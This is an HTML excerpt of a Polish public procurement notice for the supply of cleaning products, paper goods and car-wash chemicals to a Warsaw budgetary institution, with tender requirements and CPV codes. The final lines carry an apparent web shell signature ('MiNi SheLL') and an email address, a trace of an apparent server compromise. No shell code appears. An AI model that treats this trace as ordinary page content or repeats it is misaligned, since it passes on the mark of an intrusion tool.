<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wzór zobowiązania - Załącznik Nr 4.
2.Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 Pzp i rozdziale V ust. 1 pkt 2) - 4)  SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b Pzp, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda załączenia do oferty pisemnego zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z oświadczeniem w sprawie zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia (wzór oświadczenia) - Załącznik Nr 4A.
3.Dowody potwierdzające że dostawy zostały wykonane lub są wykonywane należycie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igbmazovia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA 
ul. Kocjana 3
01-473 Warszawa
sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 10:00, miejsce: Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA 
ul. Kocjana 3
01-473 Warszawa
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> SUKCESYWNA DOSTAWA ŚRODKÓW CZYSZCZĄCYCH, WYROBÓW WŁÓKIENNICZYCH, PAPIERÓW I RĘCZNIKÓW PAPIEROWYCH..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup i sukcesywna dostawa środków czyszczących, wyrobów włókienniczych, mydła, detergentów, preparatów myjących i piorących, rękawic gumowych i jednorazowych, środków higieny osobistej, papierów i ręczników papierowych oraz produktów z tworzyw sztucznych używanych w gospodarstwie domowym. 
2.W treści formularza ofertowego (kolumna trzecia) wykonawca zobowiązany jest podać nazwę oferowanego towaru oraz producenta. Brak podania parametrów oferowanego sprzętu spowoduje odrzucenie oferty na podstawie ar 7. 89 ust. 1 pkt 2 Pzp.
3.Miejscem dostarczenia środków chemicznych jest Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA przy ul. Kocjana 3 w Warszawie, Stołówka Pracownicza Mazowieckiej Instytucji Gospodarki Budżetowej MAZOVIA ul. Rakowiecka 37A w Warszawie, Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA Oddział w Warszawie Mokotowie ul. Rakowiecka 37A w Warszawie, Bufet Politechnika Warszawska ul. Narbutta 85 w Warszawie  
4.W przypadku zaoferowania produktu/produktów równoważnych zamawiający żąda załączenia do oferty nieodpłatnych próbek oraz udowodnienia, że określony produkt/produkty są równoważne. Zamawiający zastrzega sobie możliwość zlecenia na koszt Wykonawcy badań zaoferowanych produktów równoważnych w jednostce badawczej posiadającej uprawnienia do przeprowadzenia stosownych badań, w przypadku istotnych wątpliwości, co do ich równoważności, w szczególności dotyczących: nieprzyjemnego i żrącego zapach powodującego np. łzawienie oczu jak również podrażnienie spojówek podczas wykorzystania preparatu, produktu.
5.Szczegółowy formularz cenowy środków czystościowych przedmiotu zamówienia stanowi Załącznik Nr 1A do opisu przedmiotu zamówienia.
6.Środki chemiczne używane w do wykonania podmiotu umowy będą posiadały wymagane atesty, zezwalające na stosowanie ich w Polsce.
7.Wykonawca, najpóźniej w dniu podpisania umowy, zobowiązany będzie do dostarczenia kart charakterystyki substancji niebezpiecznych środków czystości, które takich kart wymagają.
8.Zamawiający zastrzega sobie, że ilości środków chemicznych wskazanych w Formularzu cenowym są ilościami szacunkowymi, służącymi jedynie do skalkulowania ceny oferty, porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy, z którym zamawiający podpisze umowę nie przysługuje roszczenie o realizacje dostawy w wielkościach podanych w Formularzu oferty. Zakupy dokonane w trakcie realizacji umowy mogę różnić się ilościowo od tych podanych w Formularzu cenowym, jednak łączna wartość zakupów nie przekroczy całkowitej wartości zamówienia.
9.Jeśli w trakcie realizacji umowy wystąpi konieczność zakupu środków chemicznych niewymienionych w Formularzu cenowym, a które są niezbędne do funkcjonowania Zamawiającego, będą one zamówione u Wykonawcy w ramach zawartej umowy. Ceny tych środków nie mogą być wyższe niż ceny producentów maksymalnie z 2 % procentową marżą. Zamówienie nastąpi po otrzymaniu wyceny od Wykonawcy i po akceptacji ceny przez Zamawiającego. Zamawiający zastrzega, że łączna wartość dostaw w trakcie realizacji umowy nie przekroczy ceny oferty wybranego wykonawcy. 
10. Określenia przedmiotu zamówienia ze Wspólnym słownikiem zamówień:
39800000-0 - środki czyszczące i polerujące;
39224000-8 - miotły i szczotki i inne artykuły różnego rodzaju;
39224320-7 - gąbki;
39224320-7 - mydła;
24950000-8 - specjalistyczne produkty chemiczne;
39831200-8 - detergenty;
39811100-1 - odświeżacze powietrza;
39812000-7 - pasty i kremy;
39510000-0 - wyroby włókiennicze używane w gospodarstwie domowym;
33763000-6- ręczniki papierowe;
33761000-2- papiery toaletowe;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.22.40.00-8, 39.22.43.20-7, 24.95.00.00-8, 39.83.12.00-8, 39.81.11.00-1, 39.81.20.00-7, 39.51.00.00-0, 33.76.30.00-6, 33.76.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> SUKCESYWNA DOSTAWA ŚRODKÓW DO PIELĘGNACJI I MYCIA UŻYWANYCH W MYJNIACH SAMOCHODOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup i sukcesywna dostawa środków do pielęgnacji i mycia używanych w myjniach samochodowych.
2.W treści formularza ofertowego (kolumna trzecia) wykonawca zobowiązany jest podać nazwę oferowanego towaru oraz producenta. Brak podania parametrów oferowanego sprzętu spowoduje odrzucenie oferty na podstawie ar 7. 89 ust. 1 pkt 2 Pzp.
3.Miejscem dostarczenia środków do pielęgnacji i mycia używane w myjniach samochodowych jest Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA przy ul. Kocjana 3 w Warszawie, Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA Oddział w Warszawie Mokotowie ul. Rakowiecka 37A w Warszawie.  
4.W przypadku zaoferowania produktu/produktów równoważnych zamawiający żąda załączenia do oferty nieodpłatnych próbek oraz udowodnienia że określony produkt/produkty są równoważne. Zamawiający zastrzega sobie możliwość zlecenia na koszt Wykonawcy badań zaoferowanych produktów równoważnych w jednostce badawczej posiadającej uprawnienia do przeprowadzenia stosownych badań, w przypadku istotnych wątpliwości co do ich równoważności, w szczególności dotyczących: nieprzyjemnego i żrącego zapach powodującego np. łzawienie oczu jak również podrażnienie spojówek podczas wykorzystania preparatu/produktu.
5.Szczegółowy przedmiot zamówienia zawiera formularz cenowy stanowiący Załącznik Nr 1B do opisu przedmiotu zamówienia.
6.Środki chemiczne używane do wykonania przedmiotu umowy będą posiadały wymagane atesty, zezwalające na stosowanie ich w Polsce.
7.Wykonawca, najpóźniej w dniu podpisania umowy, zobowiązany będzie do dostarczenia kart charakterystyki substancji niebezpiecznych środków czystości, które takich kart wymagają.
8.Podane w Załączniku Nr 1B  ilości stanowią szacunkowe zapotrzebowanie. Zamawiający zastrzega sobie prawo:
-rezygnacji z zakupu części produktów wynikającym z braku lub ograniczenia zapotrzebowania;
-zamiany ilości zamawianych produktów w ramach wartości i asortymentu określonego w umowie, w przypadku zmiany potrzeb Zamawiającego.
Wykonawcy, z którym zamawiający podpisze umowę nie przysługuje roszczenie o realizacje dostawy w wielkościach podanych w Formularzu oferty.
2. Określenia przedmiotu zamówienia ze Wspólnym słownikiem zamówień:
39800000-0 - środki czyszczące i polerujące
39831500-1 - samochodowe środki czyszczące;
39224320-7 - gąbki;
24950000-8 - specjalistyczne produkty chemiczne;
39831200-8 - detergenty.
33763000-6 - ręczniki papierowe , 
39510000-0 wyroby włókiennicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.15.00-1, 39.80.00.00-0, 39.22.43.20-7, 24.95.00.00-8, 39.83.12.00-8, 33.76.30.00-6, 39.51.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com